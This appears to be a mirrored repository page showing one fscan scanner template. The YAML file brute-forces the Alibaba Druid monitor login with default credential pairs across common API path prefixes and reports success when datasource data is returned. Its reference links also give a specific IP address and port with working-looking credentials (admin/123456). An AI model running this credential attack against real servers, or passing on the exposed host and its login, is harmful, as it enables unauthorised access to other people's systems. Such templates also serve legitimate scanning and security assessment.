mirrors/fscan
1
0
Fork 0
mirror of https://github.com/shadow1ng/fscan.git synced 2025-07-13 21:02:44 +08:00
Code Issues Actions Packages Projects Releases Wiki Activity
f25afe6e97
fscan/WebScan/pocs/druid-monitor-weakpass.yml
newcodor f25afe6e97 init: sync poc
2025-06-11 00:17:15 +08:00

34 lines
1.0 KiB
YAML
Raw Blame History

name: poc-yaml-druid-monitor-weakpass
sets:
weakpass:
- loginUsername=admin&loginPassword=admin
- loginUsername=ry&loginPassword=123456
- loginUsername=admin&loginPassword=123456
- loginUsername=ruoyi&loginPassword=admin123
- loginUsername=dy&loginPassword=123456
- loginUsername=ruoyi&loginPassword=123456
- loginUsername=dy&loginPassword=admin123
- loginUsername=druid&loginPassword=druid
- loginUsername=admin&loginPassword=admin123
uri:
- /
- /api/
- /admin/
- /admin-api/
- /prod-api/
- /jeecg-boot/
- /dev-api/
- /system/
- /webpage/system/
rules:
- method: POST
# path: /druid/datasource.json
path: "{{uri}}druid/datasource.json"
body: "{{weakpass}}"
expression: |
response.status == 200 && response.body.bcontains(b"FilterClassNames") && response.body.bcontains(b"com.alibaba.druid")
detail:
author: rootmog
links:
- https://github.com/alibaba/druid
- http://39.108.94.156:8086/druid/index.html(admin/123456)\
Reference in New Issue View Git Blame Copy Permalink